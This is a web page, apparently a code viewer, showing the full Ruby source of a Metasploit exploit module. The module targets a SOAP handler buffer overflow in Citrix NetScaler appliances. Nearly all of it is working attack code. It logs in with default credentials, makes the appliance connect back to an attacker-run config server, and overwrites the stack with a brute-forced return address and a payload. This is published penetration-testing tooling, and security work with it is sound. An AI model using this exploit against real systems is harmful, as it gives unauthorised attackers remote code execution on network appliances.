Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Remote::TcpServer10include Msf::Exploit::Brute1112def initialize(info={})13super(update_info(info,14'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",15'Description' => %q{16This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.17The vulnerability exists in the SOAP handler, accessible through the web interface. A18malicious SOAP requests can force the handler to connect to a malicious NetScaler config19server. This malicious config server can send a specially crafted response in order to20trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary21code with the privileges of the web server running the SOAP handler. This module has been22tested successfully on the NetScaler Virtual Appliance 450010.23},24'License' => MSF_LICENSE,25'Author' =>26[27'Bradley Austin', # Vulnerability Discovery and PoC28'juan vazquez' # Metasploit module29],30'References' =>31[32['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']33],34'Payload' =>35{36'Space' => 1024,37'MinNops' => 512,38'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -350039},40'Arch' => ARCH_X86,41'Platform' => 'bsd',42'Stance' => Msf::Exploit::Stance::Aggressive,43'Targets' =>44[45[ 'NetScaler Virtual Appliance 450010',46{47'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.48'Offset' => 606,49'Ret' => 0xffffda94, # Try before bruteforce...50# The virtual appliance lacks of security mitigations like DEP/ASLR, since the51# process being exploited is an apache child, the bruteforce attack works fine52# here.53'Bruteforce' =>54{55'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack56'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack57'Step' => 25658}59}60],61],62'DisclosureDate' => '2014-09-22',63'DefaultTarget' => 0))6465register_options(66[67OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),68OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),69OptPort.new('SRVPORT', [true, "The local port to listen on.", 3010])70])71end727374def check75res = send_request_cgi({76'method' => 'GET',77'uri' => normalize_uri(target_uri.path)78})7980if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m81return Exploit::CheckCode::Detected82end8384Exploit::CheckCode::Unknown85end8687def exploit88if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])89fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')90end9192if check != Exploit::CheckCode::Detected93fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")94end9596start_service9798if target.ret99@curr_ret = target.ret100send_request_soap101Rex.sleep(3)102103if session_created?104return105end106end107108super109end110111def brute_exploit(addrs)112@curr_ret = addrs['Ret']113send_request_soap114end115116def send_request_soap117soap = <<-EOS118<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">119<SOAP-ENV:Body>120<ns7744:login xmlns:ns7744="urn:NSConfig">121<username xsi:type="xsd:string">nsroot</username>122<password xsi:type="xsd:string">nsroot</password>123<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>124<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>125<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>126</ns7744:login>127</SOAP-ENV:Body>128</SOAP-ENV:Envelope>129EOS130131print_status("Sending soap request...")132133send_request_cgi({134'method' => 'POST',135'uri' => normalize_uri(target_uri.path),136'data' => soap137}, 1)138end139140def on_client_data(c)141print_status("#{c.peerhost} - Getting request...")142143data = c.get_once(2)144req_length = data.unpack("v")[0]145146req_data = c.get_once(req_length - 2)147unless req_data.unpack("V")[0] == 0xa5a50000148print_error("#{c.peerhost} - Incorrect request... sending payload anyway")149end150151print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")152153my_payload = Rex::Text.pattern_create(target['Offset'])154my_payload << [@curr_ret, target['RwPtr']].pack("V*")155my_payload << payload.encoded156157pkt = [my_payload.length + 6].pack("v")158pkt << "\x00\x00\xa5\xa5"159pkt << my_payload160c.put(pkt)161c.disconnect162end163end164165166